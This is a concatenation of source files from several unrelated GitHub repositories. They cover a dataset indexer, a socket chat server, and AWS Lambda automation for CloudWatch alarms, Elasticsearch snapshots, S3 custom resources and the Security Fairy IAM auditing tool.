# TODO: Implements some checks to verify edits to the dataset from last pickle.dump(data)
storing_data_path = dataset_path + "/info.txt"
if update and os.path.exists(dataset_path + "/info.txt"):
os.remove(dataset_path + "/info.txt")
if os.path.isfile(storing_data_path):
with open(storing_data_path, 'rb') as filehandle:
data = pickle.load(filehandle)
class_info = data['class_info']
ds_info = data['ds_info']
# CHECKS if the paths stored match the DB
# TODO: This check just pick 3 elements and check existence, can be improved
if not os.path.exists(choice(ds_info['train_paths'])) or not os.path.exists(choice(ds_info['val_paths'])) \
or not os.path.exists(choice(ds_info['test_paths'])):
print(f"Dataset paths seem incorrect, "
f"you should update the dataset info running '-m DATA -d {dataset_path}")
exit()
# Shuffle elements
else:
shuffle(ds_info['train_paths'])
shuffle(ds_info['val_paths'])
shuffle(ds_info['final_training_paths'])
shuffle(ds_info['test_paths'])
else:
# Create dataset filepaths
train_paths = [os.path.join(r, file) for r, d, f in os.walk(dataset_path + "/training/train")
for file in f if ".png" in file or ".jpg" in file]
val_paths = [os.path.join(r, file) for r, d, f in os.walk(dataset_path + "/training/val")
for file in f if ".png" in file or ".jpg" in file]
final_training_paths = [os.path.join(r, file) for r, d, f in os.walk(dataset_path + "/training")
for file in f if ".png" in file or ".jpg" in file]
test_paths = [os.path.join(r, file) for r, d, f in os.walk(dataset_path + "/test")
for file in f if ".png" in file or ".jpg" in file]
ds_info = {'ds_type': 'images', 'train_paths': train_paths, 'val_paths': val_paths, 'test_paths': test_paths,
'final_training_paths': final_training_paths}
temp_class_names = np.array([item.name for item in pathlib.Path(dataset_path + "/training/train").glob('*')])
# Sort class_names to keep same order, which influence training in one-hot encore, over different machines
class_names = np.sort(temp_class_names, axis=-1)
nclasses = len(class_names)
class_info = {"class_names": class_names, "n_classes": nclasses}
# GENERAL STATS
size_train = len(train_paths)
size_val = len(val_paths)
size_test = len(test_paths)
class_info.update({"train_size": size_train, "val_size": size_val, "test_size": size_test, 'info': {}})
for name in class_names:
size_trainf = sum([len(files) for r, d, files in os.walk(dataset_path + "/training/train/{}".format(name))])
size_valf = sum([len(files) for r, d, files in os.walk(dataset_path + "/training/val/{}".format(name))])
size_testf = sum([len(files) for r, d, files in os.walk(dataset_path + "/test/{}".format(name))])
class_info['info']["{}".format(name)] = {}
class_info['info']["{}".format(name)]['TRAIN'] = size_trainf
class_info['info']["{}".format(name)]['VAL'] = size_valf
class_info['info']["{}".format(name)]['TEST'] = size_testf
class_info['info']["{}".format(name)]['TOT'] = size_testf + size_valf + size_trainf
with open(storing_data_path, 'wb') as filehandle:
data = {'ds_info': ds_info, 'class_info': class_info}
pickle.dump(data, filehandle)
return class_info, ds_info
``` |
{
"source": "1stop-st/structural_calculator",
"score": 3
} |
#### File: structural_calculator/structural_calculator/node.py
```python
import numpy as np
class Node:
"""
Representing a Node object.
Nodes connect members.
"""
def __init__(self):
self.position = np.zeros(3)
self.mass = 0.
self.displacement = np.zeros(6)
self.model = None
``` |
{
"source": "1StranGe/Chat-Room-101",
"score": 3
} |
#### File: Chat-Room-101/src/Server.py
```python
import socket
from threading import Thread
import time
data = open("../assets/version.txt", "r").read()
print("Chat Room 101 | " + data)
time.sleep(1)
clients = {}
addresses = {}
host = socket.gethostname()
ip = socket.gethostbyname(host)
port = 8080
s = socket.socket()
s.bind((host, port))
print(host, ip)
print("Ask clients to enter host IP as :", ip, "and port as :", port)
def accept_client():
while True:
client_con, client_address = s.accept()
client_con.send(
"Hey! Welcome to the Chat Room. Enter Your Name To Continue.".encode("utf8")
)
addresses[client_address] = client_address
t2 = Thread(target=handle_client, args=(client_con, client_address)).start()
print(client_address, "Has Connected")
def broadcast(message, prefix=""):
for x in clients:
x.send(bytes(prefix, "utf8") + message)
def handle_client(con, adr):
name = con.recv(1024).decode("utf8")
welcome_message = (
"Thanks for using this Chat Room "
+ name
+ ". You can use #quit if you want to exit"
)
con.send(bytes(welcome_message, "utf8"))
print(name, "has joint the chat")
message = name + " has joint the chat!"
broadcast(bytes(message, "utf8"))
clients[con] = name
try:
while True:
message = con.recv(1024)
if message != bytes("#quit", "utf8"):
broadcast(message, name + ": ")
else:
con.close()
del clients[con]
broadcast(bytes(name + " has left the chat.", "utf8"))
except:
print(name + " has left the chat")
if __name__ == "__main__":
s.listen()
print("The Server Is Now Online")
t1 = Thread(target=accept_client)
t1.start()
t1.join() # Waits for one thread to stop before running the next.
``` |
{
"source": "1Strategy/cloudvelum",
"score": 2
} |
#### File: cloudwedge/services/statemachine.py
```python
from os import environ
from typing import Any, Dict, List, Optional
import boto3
import jmespath
from cloudwedge.models import AWSResource, AWSService
from cloudwedge.utils.logger import get_logger
from cloudwedge.utils.tags import TagsApi
REGION = environ.get('REGION')
LOGGER = get_logger("cloudwedge.statemachine")
# Model for Service, extending AWSResource
class StateMachineResource(AWSResource):
pass
# Class for Service
class StateMachineService(AWSService):
# Name of the service, must be unique
name = "statemachine"
# Cloudwatch alarm service specific values
cloudwatch_namespace = "AWS/States"
cloudwatch_dashboard_section_title = "States"
cloudwatch_dimension = "StateMachineArn"
# Default metric to be used when metrics are not explicit in tags
default_metrics = ["ExecutionsFailed",
"ExecutionThrottled",
"ExecutionTime"]
# Alarm defaults for the service, applied if metric default doesnt exist
default_alarm_props = {
'Statistic': "Sum"
}
# List of supported metrics and default configurations
supported_metrics = {
'ExecutionsStarted': {},
'ExecutionThrottled': {},
'ExecutionsAborted': {},
'ExecutionsSucceeded': {},
'ExecutionsFailed': {},
'ExecutionsTimedOut': {},
'ExecutionTime': {}
}
# There are dashboard additions that can be added at the metric level
override_dashboard_metric_properties = {}
@staticmethod
def build_dashboard_widgets(resources: List[StateMachineResource]) -> List[Any]:
"""
Build dashboard widgets for the resources
"""
# Get widgets with base method (like calling super)
return AWSService.build_dashboard_widgets(StateMachineService, resources)
@ staticmethod
def get_resources(session: boto3.session.Session) -> List[StateMachineResource]:
"""
Return all AWS StateMachine resources within scope, based on the tags
"""
try:
# Get things in a neat statemachine resource object
cleaned_resources: List[StateMachineResource] = []
# Get paginator for service
paginator = session.client('stepfunctions').get_paginator(
'list_state_machines').paginate()
# Collect all resources
for page_resources in paginator:
for state_machine in page_resources['stateMachines']:
state_arn = state_machine['stateMachineArn']
# For each state, get the tags
states_resource_tags = session.client('stepfunctions').list_tags_for_resource(
resourceArn=state_arn)
states_tags = states_resource_tags['tags']
# Keys for the tags are 'key' and 'value' so convert that to capitalize
converted_tags = TagsApi.convert_lowercase_tags_keys(
states_tags)
# If the active monitoring tag is on the instance, include in resource collection
# Stripping key so no whitespace mismatch
if any((tag['Key'].strip() == AWSService.TAG_ACTIVE and tag['Value'] == 'true') for tag in converted_tags):
# This resource has opted in to cloudwedge
# Get values from tags if they exist
owner_from_tag = TagsApi.get_owner_from_tags(converted_tags)
name_from_tag = TagsApi.get_name_from_tags(converted_tags)
state_name = state_machine['name']
# Setup StateMachine values
service = StateMachineService.name
resource_name = name_from_tag or state_name
resource_id = state_arn
resource_owner = owner_from_tag
tags = converted_tags
# Create StateMachine
clean_resource = StateMachineResource(
service=service,
name=resource_name,
uniqueId=resource_name,
cloudwatchDimensionId=resource_id,
owner=resource_owner,
tags=tags
)
# Add to collection
cleaned_resources.append(clean_resource)
return cleaned_resources
except Exception as err:
LOGGER.info(
f"Failed to get resources information with error: {err}")
raise err
```
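A hedged sketch of calling the service directly; it assumes AWS credentials and the `REGION` environment variable are configured, and that some Step Functions state machines carry the cloudwedge opt-in tag.
```python
import boto3
from cloudwedge.services.statemachine import StateMachineService

session = boto3.session.Session()
resources = StateMachineService.get_resources(session)   # only tagged state machines
print(f"found {len(resources)} opted-in state machines")
widgets = StateMachineService.build_dashboard_widgets(resources)
```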
#### File: src/create_stacks/alarms_factory.py
```python
import hashlib
import json
import time
from os import environ
from typing import Dict, List
from cloudwedge.models import AWSResource
from cloudwedge.services import ServiceRegistry
from cloudwedge.utils.logger import get_logger
from cloudwedge.utils.s3 import s3_save_object
from resource_alarm_factory import ResourceAlarmFactory
PRIVATE_ASSETS_BUCKET = environ.get('PRIVATE_ASSETS_BUCKET')
LOGGER = get_logger('AlarmsFactory')
class AlarmsFactory():
def __init__(self, session, owner, resources: Dict[str, List[AWSResource]]):
LOGGER.info(f'🚨🏭 AlarmsFactory: {owner}')
# Track the session provided
self.session = session
# Owner of the resource
self.owner = owner
# Collection of resources, grouped by service
self.resources = resources
# Hold the templates that are created
self.alarms = {
'stackName': f'cloudwedge-autogen-{self.owner}-alarms-stack',
's3TemplateKey': None,
'template': {
"AWSTemplateFormatVersion": "2010-09-09",
"Description": f"CloudWedge Alarm Stack for all resources that have owner {self.owner}. This stack is created dynamically by CloudWedge.",
"Resources": {}
}
}
def get_stack_details(self):
"""Return stack details"""
return {
'stackName': self.alarms['stackName'],
's3TemplateKey': self.alarms['s3TemplateKey'],
'stackType': 'alarms',
'stackOwner': self.owner
}
def build(self):
"""Build alarms template for all the resources"""
# Reset the template
self.alarms['template']['Resources'] = {}
self.alarms['s3TemplateKey'] = None
# For each resource in the service group
for service_name, service_resources in self.resources.items():
# Get the service class from the registry
service = ServiceRegistry.get_service(service_name)
# Build json template for the resource
for resource in service_resources:
resource_alarm_factory = ResourceAlarmFactory(resource=resource, service=service)
# Build all the alarms for the resource
resource_alarms_template = resource_alarm_factory.build()
# Add alarms for this resource to the templates Resources section
self.alarms['template']['Resources'].update(
resource_alarms_template)
# Save the template to s3
self._save_stack(self.alarms)
# # LOCAL: write template
# self._write_template(self.alarms['template'])
def _save_stack(self, stack):
"""Save the stack to s3 and return the key"""
# Convert template to string
s3_content = json.dumps(stack['template'])
# Make s3 key for this stack
# s3_key = f'templates/{stack["stackName"]}/template.json'
s3_key = f'templates/{stack["stackName"]}/{int(time.time())}/template.json'
# Save the template
saved_key = s3_save_object(session=self.session, bucket=PRIVATE_ASSETS_BUCKET, key=s3_key,
content=s3_content)
self.alarms['s3TemplateKey'] = saved_key
# @staticmethod
# def _write_template(cf_template):
# """Local Only: Test function for running locally to write formation to file for review"""
# TEMPLATE_NAME = f"/tmp/EXAMPLE_OUTPUT.yaml"
# with open(TEMPLATE_NAME, 'w') as f:
# f.write(json.dumps(cf_template))
``` |
{
"source": "1Strategy/custom-elasticsearch-snapshots",
"score": 3
} |
#### File: functions/snapshot_function/es_snapshot.py
```python
from elasticsearch.exceptions import ConnectionError, ConnectionTimeout
from elasticsearch import Elasticsearch, RequestsHttpConnection
from requests_aws4auth import AWS4Auth
from datetime import datetime as dt
import logging
import boto3
import os
def handler(event: dict, _) -> None:
"""AWS Lambda function handler - Elasticsearch Domain Snapshot function
:type: dict
:param: event: aws cloudwatch schedule event
:type: dict
:param: _: (Unused) aws lambda function environment context
:rtype: None
"""
logger: logging.Logger = log(__name__.upper())
logger.info(f'EVENT: {event}')
dt_now = dt.now()
snapshot_file_name: str = f'{dt_now.year}-{dt_now.month}-{dt_now.day}-{dt_now.hour}-{dt_now.minute}-{dt_now.second}'
es: 'Elasticsearch' = get_es_connection()
logger.info(f'ES INSTANCE CONNECTION ACTIVE: {es.ping()}')
try:
response = es.snapshot.create(
repository=os.getenv('REPO_NAME'),
snapshot=snapshot_file_name
)
logger.info(f'RESPONSE: {response}')
except (ConnectionError, ConnectionTimeout) as e:
logger.error(e)
def get_signature() -> 'AWS4Auth':
"""Construct an AWS4Auth object for use with STS temporary credentials. The `x-amz-security-token` header is added with the session token.
:rtype: 'AWS4Auth'
"""
logger: logging.Logger = log(__name__.upper())
logger.info('Getting credentials')
credentials = boto3.Session().get_credentials()
return AWS4Auth(
credentials.access_key,
credentials.secret_key,
os.getenv('AWS_REGION'),
'es',
session_token=credentials.token
)
def get_es_connection() -> 'Elasticsearch':
"""Elasticsearch low-level client. Provides a straightforward mapping from Python to ES REST endpoints
:rtype: 'Elasticsearch'
"""
logger: logging.Logger = log(__name__.upper())
logger.info('Getting Elasticsearch Connection')
return Elasticsearch(
hosts=['https://' + os.getenv('ES_HOST')],
http_auth=get_signature(),
use_ssl=True,
verify_certs=True,
connection_class=RequestsHttpConnection
)
def log(name='aws_entity', logging_level=logging.INFO) -> logging.Logger:
"""Instantiate a logger
"""
logger: logging.Logger = logging.getLogger(name)
if len(logger.handlers) < 1:
log_handler: logging.StreamHandler = logging.StreamHandler()
formatter: logging.Formatter = logging.Formatter('%(levelname)-8s %(asctime)s %(name)-12s %(message)s')
log_handler.setFormatter(formatter)
logger.propagate = False
logger.addHandler(log_handler)
logger.setLevel(logging_level)
return logger
``` |
{
"source": "1Strategy/custom-resource-starter-template",
"score": 3
} |
#### File: functions/empty_bucket/empty_bucket.py
```python
import boto3
import logging
from crhelper import CfnResource
helper = CfnResource(json_logging=False, log_level='DEBUG', boto_level='CRITICAL')
def handler(event: dict, context: dict) -> None:
"""AWS Lambda function handler
:type: dict
:param: event: aws cloudformation custom resource event
:type: dict
:param: context: aws lambda function environment context
:rtype: dict
"""
logger: logging.Logger = log('CUSTOM RESOURCE HANDLER')
logger.info(f'EVENT: {event}')
helper(event, context)
@helper.create
def create(event: dict, _) -> None:
"""Custom Resource Helper for CloudFormation Create Event.
Decorator abstracts away the HTTP request/response cycle handled during Custom Resource events
Example Purpose: Populates empty bucket with 1000+ objects to specifically illustrate the CFn Delete event
:type: dict
:param: event: aws cloudformation custom resource event
:rtype: None
"""
logger: logging.Logger = log('CUSTOM RESOURCE HANDLER: CREATE')
# NOTE: Code below is for example purposes only, and would not be desirable in practical usage of the custom resource
client = boto3.client('s3')
for i in range(1001):
client.put_object(
Bucket=event['ResourceProperties']['BucketName'],
Body=b'Foo',
Key='file_' + '{:04d}'.format(i)
)
logger.info('Successfully put objects in bucket')
@helper.update
def update(event: dict, _) -> None:
"""Custom Resource Helper for CloudFormation Update Event.
Decorator abstracts away the HTTP request/response cycle handled during Custom Resource events
Example Purpose: Populates empty bucket with 1000+ objects (if objects not present) to specifically illustrate the CFn Delete event
:type: dict
:param: event: aws cloudformation custom resource event
:rtype: None
"""
logger: logging.Logger = log('CUSTOM RESOURCE HANDLER: UPDATE')
# NOTE: Code below is for example purposes only, and would not be desirable in practical usage of the custom resource
client = boto3.client('s3')
bucket_name = event['ResourceProperties']['BucketName']
objects = client.list_objects_v2(Bucket=bucket_name)
if objects['KeyCount'] < 1000:
        create(event, None)  # create() takes (event, context); the context argument is unused here
else:
logger.info('Bucket has already been populated.')
@helper.delete
def delete(event: dict, _) -> None:
"""Custom Resource Helper for CloudFormation Delete Event.
Decorator abstracts away the HTTP request/response cycle handled during Custom Resource events
Example Purpose: Removes all objects from bucket, allowing the bucket to be removed during a CFn Stack Deletion
Note: If this process is not facilitated, the Stack Deletion fails because the S3 bucket has objects within.
:type: dict
:param: event: aws cloudformation custom resource event
:rtype: None
"""
logger: logging.Logger = log('CUSTOM RESOURCE HANDLER: DELETE')
s3 = boto3.resource('s3')
bucket_name = event['ResourceProperties']['BucketName']
bucket = s3.Bucket(bucket_name)
objects = bucket.objects.all()
objects.delete()
logger.info('Successfully deleted all objects in bucket')
def log(name: str = 'aws_entity', logging_level: int = logging.INFO) -> logging.Logger:
"""Instantiate a logger
"""
logger: logging.Logger = logging.getLogger(name)
log_handler: logging.StreamHandler = logging.StreamHandler()
formatter: logging.Formatter = logging.Formatter('%(levelname)-8s %(asctime)s %(name)-12s %(message)s')
log_handler.setFormatter(formatter)
logger.addHandler(log_handler)
logger.setLevel(logging_level)
return logger
``` |
{
"source": "1Strategy/security-fairy",
"score": 2
} |
#### File: 1Strategy/security-fairy/api_endpoint.py
```python
import json
import re
import os
import string
import boto3
from botocore.exceptions import ProfileNotFound
from aws_entity import AWSEntity
try:
SESSION = boto3.session.Session(profile_name='training', region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(event, context):
"""
Executed by the Lambda service.
Returns the validated inputs and invokes
the State Machine that orchestrates
Security Fairy.
"""
api_return_payload = {
'statusCode': 500,
'headers':{
'Content-Type':'application/json'
},
'body':'Security Fairy Internal Server Error.'
}
domain = get_domain(event)
method = event['httpMethod']
if method == 'GET':
return api_website(event, domain)
if method == 'POST':
return post_response(event, domain)
return api_return_payload
def post_response(event, domain):
api_return_payload = {
'statusCode': 500,
'headers':{
'Content-Type':'application/json'
},
'body':'Security Fairy Internal Server Error.'
}
print(event)
try:
inputs = validate_inputs(event)
invoke_state_machine(inputs)
api_return_payload['statusCode'] = 200
api_return_payload['body'] = 'The auditing process can take up to 20 minutes. An email will be sent upon completion.'
except Exception as error:
print(error)
api_return_payload['statusCode'] = 200
api_return_payload['body'] = "Unsuccessful: {error}".format(error=error)
    print(api_return_payload)
return api_return_payload
def get_domain(event):
# Supports test invocations from API Gateway
if event['headers'] is None:
return "https://testinvocation/start"
# Extracts the domain from event object based on for both api gateway URLs
# or custom domains
if 'amazonaws.com' in event['headers']['Host']:
return "https://{domain}/{stage}{path}".format(domain=event['headers']['Host'],
stage=event['requestContext']['stage'],
path=event['path'])
else:
return "https://{domain}{path}".format(domain=event['headers']['Host'],
path=event['path'])
def invoke_state_machine(inputs):
"""Invoke state machine"""
    print(json.dumps(inputs))
sfn_client = SESSION.client('stepfunctions')
response = sfn_client.start_execution(stateMachineArn=os.environ['state_machine'],
input=json.dumps(inputs)
)
print(response)
def validate_inputs(event):
"""Validate inputs"""
input_payload = json.loads(event['body'])
num_days = validate_date_window(input_payload.get('num_days', 7))
entity_arn = validate_entity_arn(input_payload.get('entity_arn'))
return {
'num_days' : num_days*-1,
'entity_arn': entity_arn
}
def validate_date_window(days):
"""Validate the date range for the Security Fairy query"""
window = abs(days)
if window > 30 or window < 1:
        print(window)
raise ValueError('Valid number of days is between 1 and 30 inclusive.')
return window
def validate_entity_arn(entity_arn):
"""Validate entity ARN"""
# account_number = SESSION.client('sts').get_caller_identity()["Account"]
# Roles are valid: arn:aws:iam::842337631775:role/1S-Admins
# arn:aws:sts::281782457076:assumed-role/1S-Admins/alex
# Users are invalid: arn:aws:iam::842337631775:user/aaron
try:
arn = AWSEntity(entity_arn)
except Exception:
raise ValueError('Malformed ARN. Please enter a role ARN.')
print(arn.entity_type)
if 'user' in arn.entity_type:
raise ValueError('Users not supported. Please enter a role ARN.')
if 'group' in arn.entity_type:
raise ValueError('Groups not supported. Please enter a role ARN.')
if not arn.is_assumed_role() and not arn.is_role():
raise ValueError('Invalid Resource ARN.')
# pattern = re.compile("arn:aws:(sts|iam)::(\d{12})?:(role|assumed-role)\/(.*)")
# if not pattern.match(entity_arn):
# raise ValueError('Invalid Resource ARN.')
assumed_role_pattern = re.compile("arn:aws:sts::(\d{12})?:assumed-role\/(.*)\/(.*)")
if not assumed_role_pattern.match(entity_arn):
refactored_arn = "arn:aws:sts::" + arn.get_account_number() + ":assumed-role/" + arn.get_entity_name()
entity_arn = refactored_arn
SESSION.client('iam').get_role(RoleName=arn.get_entity_name())
return entity_arn
def invoke_state_machine(inputs):
print(json.dumps(inputs))
response = SESSION.client('stepfunctions').start_execution( stateMachineArn=os.environ['state_machine'],
input=json.dumps(inputs))
print(response)
def api_website(event, domain):
body = """
<html>
<body bgcolor=\"#E6E6FA\">
<head>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="<KEY>" crossorigin="anonymous">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<style>
.form {
padding-left: 1cm;
}
.div{
padding-left: 1cm;
}
</style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<script>
$(document).ready(function(){
$("button").click(function(){
var entity_arn = document.getElementById("entity_arn").value;
var dict = {};
dict["entity_arn"] = entity_arn;
if (document.getElementById("num_days").value != "") {
dict["num_days"] = Number(document.getElementById("num_days").value);
}
else{
dict["num_days"] = 30;
};
$.ajax({
type: 'POST',
headers: {
'Content-Type':'application/json',
'Accept':'text/html'
},
url:'$domain',
crossDomain: true,
data: JSON.stringify(dict),
dataType: 'text',
success: function(responseData) {
alert(responseData);
//document.getElementById("id").innerHTML = responseData;
document.getElementById("entity_arn").value="";
document.getElementById("num_days").value="";
},
error: function (responseData) {
//alert(responseData);
alert('POST failed.'+ JSON.stringify(responseData));
}
});
});
});
</script>
</head>
<title>Security Fairy IAM Policy Remediation Tool</title>
<h1 class="div">Security Fairy IAM Remediation Tool</h1>
<body>
<form class="form" action="" method="post">
<textarea rows="1" cols="50" name="text" id="entity_arn" placeholder="arn:aws:iam::0123456789:role/roleName"></textarea>
</form>
<form class="form" action="" method="post">
<textarea rows="1" cols="50" name="text" id="num_days" placeholder="Scan the logs for between 1-30 days (Enter Number)"></textarea>
</form>
<div class="div"><button class="btn btn-primary">Audit Entity</button></div>
<div class="div" id="id"></div>
</body>
</html>
"""
return {
"statusCode": 200,
"headers": {
"Content-Type": 'text/html',
"Access-Control-Allow-Origin": "*"
},
"body": string.Template(body).safe_substitute({"domain": domain})
}
if __name__ == '__main__':
print(validate_entity_arn('arn:aws:sts::842337631775:assumed-role/1S-Admins/potato'))
```
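For reference, a minimal sketch of the API Gateway proxy event this handler consumes; only the fields read by `lambda_handler`, `get_domain` and `validate_inputs` are shown, and the host, account number and role name are illustrative placeholders rather than values from the repository.
```python
import json

example_event = {
    "httpMethod": "POST",
    "headers": {"Host": "abc123.execute-api.us-east-1.amazonaws.com"},
    "requestContext": {"stage": "Prod"},
    "path": "/start",
    "body": json.dumps({
        "entity_arn": "arn:aws:iam::123456789012:role/example-role",
        "num_days": 7
    })
}
# lambda_handler(example_event, None) would route this payload to post_response().
```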
#### File: 1Strategy/security-fairy/build_cloudtrail_table.py
```python
import os
import sys
import json
from datetime import datetime, timedelta
import logging
import boto3
from botocore.exceptions import ProfileNotFound
from time import sleep
# These parameters should remain static
TIME = datetime.utcnow()
AMZ_DATE = TIME.strftime('%Y%m%dT%H%M%SZ')
DATE_STAMP = TIME.strftime('%Y%m%d')
PROFILE = 'sandbox'
LOG_LEVEL = logging.DEBUG
SUCCESS = "SUCCESS"
FAILED = "FAILED"
try:
SESSION = boto3.session.Session(
profile_name=PROFILE,
region_name='us-east-1'
)
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
try:
    from urllib2 import HTTPError, build_opener, HTTPHandler, Request
except ImportError:
from urllib.error import HTTPError
from urllib.request import build_opener, HTTPHandler, Request
def send(event, context, response_status, reason=None, response_data=None, physical_resource_id=None):
response_data = response_data or {}
response_body = json.dumps(
{
'Status': response_status,
'Reason': reason or "See the details in CloudWatch Log Stream: " + context.log_stream_name,
'PhysicalResourceId': physical_resource_id or context.log_stream_name,
'StackId': event['StackId'],
'RequestId': event['RequestId'],
'LogicalResourceId': event['LogicalResourceId'],
'Data': {'ConfigJson': response_data}
}
)
logging.debug("Sending Response to CloudFormation")
logging.debug(response_body)
opener = build_opener(HTTPHandler)
request = Request(event['ResponseURL'], data=response_body.encode('utf-8'))
request.add_header('Content-Type', '')
request.add_header('Content-Length', len(response_body.encode('utf-8')))
request.get_method = lambda: 'PUT'
    try:
        response = opener.open(request)
print("Status code: {}".format(response.getcode()))
print("Status message: {}".format(response.msg))
return True
except HTTPError as exc:
print("Failed executing HTTP request: {}".format(exc.code))
return False
def save_query(cloudtrail_logs_bucket):
"""Store the CloudTrail table creation query
"""
athena = SESSION.client('athena')
acct_number = SESSION.client('sts').get_caller_identity().get('Account')
query_list = athena.list_named_queries()
name_list = []
for query in query_list.get("NamedQueryIds"):
check = athena.get_named_query(
NamedQueryId=query
)
name_list.append(check['NamedQuery'].get('Name'))
if "cloudtrail_logs" in name_list:
print("This query is already saved.")
else:
response = athena.create_named_query(
Name="cloudtrail_logs",
Description="Table of CloudTrail Logs created by Security Fairy.",
Database="aws_logs",
QueryString="""
create external table if not exists aws_logs.cloudtrail (
eventVersion string,
userIdentity
struct<
type: string,
principalId: string,
arn: string,
accountId: string,
userName: string,
invokedBy: string,
accesskeyid:string,
sessioncontext:
struct<
attributes:
struct<
mfaauthenticated:string,
creationdate:string
>,
sessionIssuer:
struct<
type:string,
principalId:string,
arn:string,
accountId:string,
userName:string
>
>
>,
eventTime string,
eventSource string,
eventName string,
awsRegion string,
sourceIPAddress string,
userAgent string,
errorCode string,
errorMessage string,
requestID string,
eventID string,
resources
array<
struct<
ARN:string,
accountId:string,
type:string
>
>,
eventType string,
apiVersion string,
readOnly boolean,
recipientAccountId string,
sharedEventID string,
vpcEndpointId string
)
partitioned by (region STRING, year STRING, month STRING, day STRING)
row format serde 'com.amazon.emr.hive.serde.CloudTrailSerde'
stored as inputformat 'com.amazon.emr.cloudtrail.CloudTrailInputFormat'
outputformat 'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat'
location 's3://{cloudtrail_bucket}/AWSLogs/{account_number}/CloudTrail/'
;""" \
.format(cloudtrail_bucket=cloudtrail_logs_bucket,
account_number=acct_number)
)
return response
def build_database(s3_bucket):
"""Build the logs database in Athena
"""
athena = SESSION.client('athena')
output = 's3://{s3_bucket}/tables'.format(s3_bucket=s3_bucket)
config = {
'OutputLocation': output,
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'
}
}
response = athena.start_query_execution(
QueryString="create database if not exists aws_logs;",
ResultConfiguration=config
)
def execute_cloudtrail_table_creation(s3_bucket):
"""Create the CloudTrail Logs table using the saved query
"""
athena = SESSION.client('athena')
query_list = athena.list_named_queries()
name_list = []
output = 's3://{s3_bucket}/tables'.format(s3_bucket=s3_bucket)
config = {
'OutputLocation': output,
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'
}
}
run_query = ''
for query_id in query_list.get("NamedQueryIds"):
query_obj = athena.get_named_query(
NamedQueryId=query_id
)
query_details = query_obj['NamedQuery']
if query_details.get('Name') == 'cloudtrail_logs':
run_query = query_details.get('QueryString')
response = athena.start_query_execution(
QueryString=run_query,
ResultConfiguration=config
)
return response
def build_inital_partitions(security_fairy_bucket, cloudtrail_bucket, account):
athena_client = SESSION.client('athena')
output = f"s3://{security_fairy_bucket}/security-fairy-partition-queries"
year = datetime.now().year
month = datetime.now().month
day = datetime.now().day
regions = ['us-west-2',
'us-west-1',
'us-east-2',
'us-east-1',
# 'ap-south-1',
# 'ap-northeast-2',
# 'ap-southeast-1',
# 'ap-southeast-2',
# 'ap-northeast-1',
# 'ca-central-1',
# 'cn-north-1',
# 'eu-central-1',
# 'eu-west-1',
# 'eu-west-2',
# 'eu-west-3',
# 'sa-east-1',
# 'us-gov-west-1'
]
config = {
'OutputLocation': output,
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'
}
}
for region in regions:
try:
for x in range(30):
new_time = datetime.now() - timedelta(x)
# sleep(.5)
response = athena_client.start_query_execution(
QueryString = f"ALTER TABLE aws_logs.cloudtrail ADD IF NOT EXISTS PARTITION (region='{region}', year={new_time.year}, month={new_time.month}, day={new_time.day}) LOCATION 's3://{cloudtrail_bucket}/AWSLogs/{account}/CloudTrail/{region}/{new_time.year}/{new_time.month}/{new_time.day}/'; ",
ResultConfiguration=config
)
#change to logger
print(response)
except Exception as e:
print(e)
def lambda_handler(event, context):
"""Lambda Handler for Build_Cloudtrail_Table
"""
logging.debug(json.dumps(event))
# Setup Logging, delete other loggers
root = logging.getLogger()
if root.handlers:
for handler in root.handlers:
root.removeHandler(handler)
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=LOG_LEVEL, datefmt='%Y-%m-%dT%H:%M:%S')
logging.getLogger('boto3').setLevel(logging.WARNING)
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.debug("Environment Variables:")
logging.info("Start Execution")
try:
cloudtrail_bucket = os.environ["cloudtrail_bucket"]
security_fairy_bucket = os.environ["security_fairy_bucket"]
account = os.environ["aws_account"]
log_level = os.environ.get('LOG_LEVEL','INFO') # Logging Level
saved = save_query(cloudtrail_bucket)
logging.debug(saved)
db = build_database(cloudtrail_bucket)
logging.debug(db)
executed = execute_cloudtrail_table_creation(cloudtrail_bucket)
build_inital_partitions(security_fairy_bucket, cloudtrail_bucket, account)
logging.debug(executed)
logging.info("Successful Execution")
send(event, context, "SUCCESS")
except Exception as error:
logging.info("Failed Execution")
logging.info(error)
send(event, context, "FAILED")
return "Error"
if __name__ == '__main__':
lambda_handler({}, {})
```
#### File: 1Strategy/security-fairy/email_approval_request.py
```python
import boto3
import logging
from requests.utils import quote
from botocore.exceptions import ProfileNotFound
from setup_logger import create_logger
logger = create_logger(name="email_approval_request.py")
try:
SESSION = boto3.session.Session(profile_name='training',
region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(event, context):
""" Executed by the Lambda service.
Sends an approval URL to the user via SNS.
"""
execution_id = event['execution_id']
task_token = quote(event['task_token'], safe='')
api_endpoint = event['api_endpoint']
approval_url = '{api_endpoint}approve?execution-id={execution_id}&task-token={tasktoken}'\
.format(api_endpoint=api_endpoint,
execution_id=execution_id,
tasktoken=task_token
)
sns_client = SESSION.client('sns')
sns_arn = event['sns_arn']
# Build message
message = 'Approve changes from Security Fairy here: {approval_url}'\
.format(approval_url=approval_url)
logger.debug(message)
response = sns_client.publish(
TopicArn=sns_arn,
Message="{message}".format(message=message),
Subject='Security Fairy Permissions Request')
logger.debug(response)
if __name__ == '__main__':
EVENT = {
'execution_id':'f0774f6d-3986-4478-be43-23b62cfc65c0',
'task_token': "<KEY>
'api_endpoint': "https://gndl1fc1ii.execute-api.us-east-1.amazonaws.com/Prod",
'sns_arn': 'arn:aws:sns:us-east-1:281782457076:security_fairy_topic'
}
lambda_handler(EVENT, {})
```
#### File: security-fairy/tests/test_classes.py
```python
import sys
sys.path.insert(0,'..')
import logging
import pytest
import json
from aws_iam_policy import IAMPolicy
from aws_iam_policy import IAMStatement
from aws_entity import Arn
